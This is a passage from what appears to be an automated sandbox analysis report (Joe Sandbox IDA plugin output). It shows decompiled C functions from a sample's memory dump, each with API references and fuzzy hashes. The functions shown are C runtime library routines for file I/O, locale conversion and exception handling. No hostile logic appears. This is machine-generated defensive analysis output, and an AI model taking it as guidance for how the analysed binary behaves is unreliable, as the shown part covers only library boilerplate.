										_t74 = E0040EB64(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040711E(_t90, _t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E004045A0(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t61 = E00409A24(_t105);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					 *_t61 = 0x16;
                                                                                                                                                                                                        					E00404E2D(_t90, 0, _t100);
                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





























                                                                                                                                                                                                        0x00407425
                                                                                                                                                                                                        0x00407426
                                                                                                                                                                                                        0x00407427
                                                                                                                                                                                                        0x00407428
                                                                                                                                                                                                        0x00407429
                                                                                                                                                                                                        0x0040742a
                                                                                                                                                                                                        0x00407430
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00407435

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __flush.LIBCMT ref: 004074C6
                                                                                                                                                                                                        • __fileno.LIBCMT ref: 004074E6
                                                                                                                                                                                                        • __locking.LIBCMT ref: 004074ED
                                                                                                                                                                                                        • __flsbuf.LIBCMT ref: 00407518
                                                                                                                                                                                                          • Part of subcall function 00409A24: __getptd_noexit.LIBCMT ref: 00409A24
                                                                                                                                                                                                          • Part of subcall function 00404E2D: __decode_pointer.LIBCMT ref: 00404E38
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3240763771-0
                                                                                                                                                                                                        • Opcode ID: dc29f09d118e550aacc3eb764c57d9025dc60e0096fa27560fbf8e4d25ed3698
                                                                                                                                                                                                        • Instruction ID: 719244e9d59235a0eaa91a05f0ae5385ab93f0e5e9c00e77f3c3a17d24c4edef
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc29f09d118e550aacc3eb764c57d9025dc60e0096fa27560fbf8e4d25ed3698
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D341E571E04604EBCB248F69888059FBBB5AF80324F24853EE455A76C0D778FD418B5A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E004144CE(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				char _t43;
                                                                                                                                                                                                        				char _t46;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				int _t57;
                                                                                                                                                                                                        				int _t58;
                                                                                                                                                                                                        				signed short* _t59;
                                                                                                                                                                                                        				short* _t60;
                                                                                                                                                                                                        				int _t65;
                                                                                                                                                                                                        				char* _t73;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t73 = _a8;
                                                                                                                                                                                                        				if(_t73 == 0 || _a12 == 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if( *_t73 != 0) {
                                                                                                                                                                                                        						E00409E7B( &_v20, __edi, _a16);
                                                                                                                                                                                                        						_t43 = _v20;
                                                                                                                                                                                                        						__eflags =  *(_t43 + 0x14);
                                                                                                                                                                                                        						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                                                                        							_t46 = E00412C90( *_t73 & 0x000000ff,  &_v20);
                                                                                                                                                                                                        							__eflags = _t46;
                                                                                                                                                                                                        							if(_t46 == 0) {
                                                                                                                                                                                                        								__eflags = _a4;
                                                                                                                                                                                                        								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									L10:
                                                                                                                                                                                                        									__eflags = _v8;
                                                                                                                                                                                                        									if(_v8 != 0) {
                                                                                                                                                                                                        										_t53 = _v12;
                                                                                                                                                                                                        										_t11 = _t53 + 0x70;
                                                                                                                                                                                                        										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                        										__eflags =  *_t11;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									return 1;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L21:
                                                                                                                                                                                                        								_t54 = E00409A24(__eflags);
                                                                                                                                                                                                        								 *_t54 = 0x2a;
                                                                                                                                                                                                        								__eflags = _v8;
                                                                                                                                                                                                        								if(_v8 != 0) {
                                                                                                                                                                                                        									_t54 = _v12;
                                                                                                                                                                                                        									_t33 = _t54 + 0x70;
                                                                                                                                                                                                        									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                        									__eflags =  *_t33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								return _t54 | 0xffffffff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t56 = _v20;
                                                                                                                                                                                                        							_t65 =  *(_t56 + 0xac);
                                                                                                                                                                                                        							__eflags = _t65 - 1;
                                                                                                                                                                                                        							if(_t65 <= 1) {
                                                                                                                                                                                                        								L17:
                                                                                                                                                                                                        								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                                                                        									goto L21;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = _t73[1];
                                                                                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                                                                                        									goto L21;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L19:
                                                                                                                                                                                                        								_t57 =  *(_t56 + 0xac);
                                                                                                                                                                                                        								__eflags = _v8;
                                                                                                                                                                                                        								if(_v8 == 0) {
                                                                                                                                                                                                        									return _t57;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                        								return _t57;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _a12 - _t65;
                                                                                                                                                                                                        							if(_a12 < _t65) {
                                                                                                                                                                                                        								goto L17;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _a4;
                                                                                                                                                                                                        							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                                                        							_t56 = _v20;
                                                                                                                                                                                                        							if(_t58 != 0) {
                                                                                                                                                                                                        								goto L19;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L17;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t59 = _a4;
                                                                                                                                                                                                        						__eflags = _t59;
                                                                                                                                                                                                        						if(_t59 != 0) {
                                                                                                                                                                                                        							 *_t59 =  *_t73 & 0x000000ff;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t60 = _a4;
                                                                                                                                                                                                        						if(_t60 != 0) {
                                                                                                                                                                                                        							 *_t60 = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00414502
                                                                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00414536
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,0040BF91,?,00000000,00000000,?,?,?,?,0040BF91,00000000,?), ref: 00414567
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,0040BF91,00000001,00000000,00000000,?,?,?,?,0040BF91,00000000,?), ref: 004145D5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                                                                        • Opcode ID: 09e858e427b0e1c327f07a847e7802bea4721f523367a191b6cf2f50b6d4ac3f
                                                                                                                                                                                                        • Instruction ID: 160bbb44cac5e1f2ae0d3363dbd79774e40217241fcf70b98eb72d27c848ece6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09e858e427b0e1c327f07a847e7802bea4721f523367a191b6cf2f50b6d4ac3f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57311231A00296EFDB20DF68C880AEE3BA6AF41310B14456AE5658B2A1D734DDC1DB68
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0040B0A8(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                        				intOrPtr _t25;
                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t25 = _a16;
                                                                                                                                                                                                        				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                                                                                                        					_t26 = E0040A999(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t34 = _t25 - 0x66;
                                                                                                                                                                                                        					if(_t25 != 0x66) {
                                                                                                                                                                                                        						__eflags = _t25 - 0x61;
                                                                                                                                                                                                        						if(_t25 == 0x61) {
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							_t26 = E0040AA89(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							__eflags = _t25 - 0x41;
                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                        								goto L7;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t26 = E0040AFAE(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						return _t26;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						return E0040AEF3(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                        • Instruction ID: e5f3382179eed6dfb443648d212c5bfb074451142b1919d7529dc229b969cfc5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1211757204014ABBCF125E85CC118EE3F22FB18354B148466FA1869171C73AC971AB8A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                                                        			E00408C46(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				intOrPtr _t28;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t30 = __eflags;
                                                                                                                                                                                                        				_t26 = __edi;
                                                                                                                                                                                                        				_t25 = __edx;
                                                                                                                                                                                                        				_t22 = __ebx;
                                                                                                                                                                                                        				_push(0xc);
                                                                                                                                                                                                        				_push(0x424f58);
                                                                                                                                                                                                        				E0040D294(__ebx, __edi, __esi);
                                                                                                                                                                                                        				_t28 = E0040B6F6(__ebx, __edx, __edi, _t30);
                                                                                                                                                                                                        				_t13 =  *0x429528; // 0xfffffffe
                                                                                                                                                                                                        				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                        					E0040D68E(_t22, 0xc);
                                                                                                                                                                                                        					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                                                                                                        					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                                                                                                        					_t26 =  *0x429610; // 0x20310f8
                                                                                                                                                                                                        					 *((intOrPtr*)(_t29 - 0x1c)) = E00408C08(_t8, _t26);
                                                                                                                                                                                                        					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                                                                                                        					E00408CB0();
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                                                                                        					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t28 =  *((intOrPtr*)(E0040B6F6(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					E0040C50B(_t25, _t26, 0x20);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E0040D2D9(_t28);
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00408C52
                                                                                                                                                                                                          • Part of subcall function 0040B6F6: __getptd_noexit.LIBCMT ref: 0040B6F9
                                                                                                                                                                                                          • Part of subcall function 0040B6F6: __amsg_exit.LIBCMT ref: 0040B706
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00408C69
                                                                                                                                                                                                        • __amsg_exit.LIBCMT ref: 00408C77
                                                                                                                                                                                                        • __lock.LIBCMT ref: 00408C87
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3521780317-0
                                                                                                                                                                                                        • Opcode ID: e948ef43bc6d0fea28fe0fd9e17d146db1c90081b3465ccd6862736e49afce69
                                                                                                                                                                                                        • Instruction ID: b51ffff0edb98b04dd63b3cd1b026f9826a3eefa25728bed931f0ca9461acfd6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e948ef43bc6d0fea28fe0fd9e17d146db1c90081b3465ccd6862736e49afce69
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19F09631A45700DBE720BBA69602B4E73B0AF00714F55457FA491772C2CF7C9945DB6E
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                                                        			E00408027(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                                                                                                                                                                                                        				intOrPtr _t17;
                                                                                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t30 = __eflags;
                                                                                                                                                                                                        				_t28 = __esi;
                                                                                                                                                                                                        				_t27 = __edi;
                                                                                                                                                                                                        				_t26 = __edx;
                                                                                                                                                                                                        				_t19 = __ebx;
                                                                                                                                                                                                        				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                                                                                                                                                                                                        				E00404C44(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
                                                                                                                                                                                                        				 *((intOrPtr*)(E0040B6F6(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                                                                                                                                                                                                        				_t17 = E0040B6F6(_t19, _t26, _t27, _t30);
                                                                                                                                                                                                        				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                                                                                                                                                                                                        				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                                                                                                                                                                                                        					_t17 =  *((intOrPtr*)(__esi + 0x14));
                                                                                                                                                                                                        					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                                                                                                                                                                                                        						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
                                                                                                                                                                                                        							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
                                                                                                                                                                                                        							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                                                                                                                                                                                                        								_t17 = E00404C1D(_t37,  *((intOrPtr*)(_t28 + 0x18)));
                                                                                                                                                                                                        								_t38 = _t17;
                                                                                                                                                                                                        								if(_t17 != 0) {
                                                                                                                                                                                                        									_push( *((intOrPtr*)(_t29 + 0x10)));
                                                                                                                                                                                                        									_push(_t28);
                                                                                                                                                                                                        									return E00407DAC(_t38);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t17;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00404C44: __getptd.LIBCMT ref: 00404C4A
                                                                                                                                                                                                          • Part of subcall function 00404C44: __getptd.LIBCMT ref: 00404C5A
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00408036
                                                                                                                                                                                                          • Part of subcall function 0040B6F6: __getptd_noexit.LIBCMT ref: 0040B6F9
                                                                                                                                                                                                          • Part of subcall function 0040B6F6: __amsg_exit.LIBCMT ref: 0040B706
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00408044
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                        • API String ID: 803148776-1018135373
                                                                                                                                                                                                        • Opcode ID: 98f0aeeb77c2e327645e28fe54aec2940b1c5bfd76adb5b08a6fd92f4f7655af
                                                                                                                                                                                                        • Instruction ID: 13cd74c94cb0020edf19eb06701f3be937950f73df6bc4a66e904e6c8aba4919
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98f0aeeb77c2e327645e28fe54aec2940b1c5bfd76adb5b08a6fd92f4f7655af
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64017830C00301CAEF389F26C644AAEB7B4AF10311F25483FE6C0762D2CF399988CA49
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00401C70() {
                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                        				char _v72;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				E00401030( &_v72, "vector<T> too long");
                                                                                                                                                                                                        				E00401CB0( &_v44,  &_v72);
                                                                                                                                                                                                        				E00404EFB( &_v44, 0x424850);
                                                                                                                                                                                                        				return E00401070( &_v72);
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMTD ref: 00401C8A
                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00401C98
                                                                                                                                                                                                          • Part of subcall function 00404EFB: RaiseException.KERNEL32(?,?,00406831,004021F3,?,?,?,?,00406831,004021F3,00424938,0042A754,004021F3,00000000,00000000), ref: 00404F3D
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                        • String ID: vector<T> too long
                                                                                                                                                                                                        • API String ID: 1843230569-3788999226
                                                                                                                                                                                                        • Opcode ID: 28022983fe490c13e59e281ddfab54bc09295bd2c2159f5e8ece6efb2ebc1a0e
                                                                                                                                                                                                        • Instruction ID: 1ad155609a6ee44803b8ea556efcf72ea858947956c892ce0e6a44d4c2884f45
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28022983fe490c13e59e281ddfab54bc09295bd2c2159f5e8ece6efb2ebc1a0e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 85E0C27191014C56C704F7E1D993DDEB33C9A14384F90023EF401320E1EE38BA06C6A8
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                                                                        			E0040F09E(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				intOrPtr _t19;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t19 = __edx;
                                                                                                                                                                                                        				_push(0x10);
                                                                                                                                                                                                        				_push(0x425168);
                                                                                                                                                                                                        				E0040D294(__ebx, __edi, __esi);
                                                                                                                                                                                                        				E00407AB0( *((intOrPtr*)(_t23 + 8)));
                                                                                                                                                                                                        				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t23 - 0x20)) = E0040ED52(__edx,  *((intOrPtr*)(_t23 + 8)));
                                                                                                                                                                                                        				 *((intOrPtr*)(_t23 - 0x1c)) = _t19;
                                                                                                                                                                                                        				 *(_t23 - 4) = 0xfffffffe;
                                                                                                                                                                                                        				E0040F0DE();
                                                                                                                                                                                                        				_t8 = _t23 - 0x20; // 0x40763d
                                                                                                                                                                                                        				return E0040D2D9( *_t8);
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __lock_file.LIBCMT ref: 0040F0AD
                                                                                                                                                                                                          • Part of subcall function 00407AB0: __lock.LIBCMT ref: 00407AD5
                                                                                                                                                                                                        • __ftelli64_nolock.LIBCMT ref: 0040F0BA
                                                                                                                                                                                                          • Part of subcall function 0040ED52: __fileno.LIBCMT ref: 0040ED72
                                                                                                                                                                                                          • Part of subcall function 0040ED52: __lseeki64.LIBCMT ref: 0040ED8F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
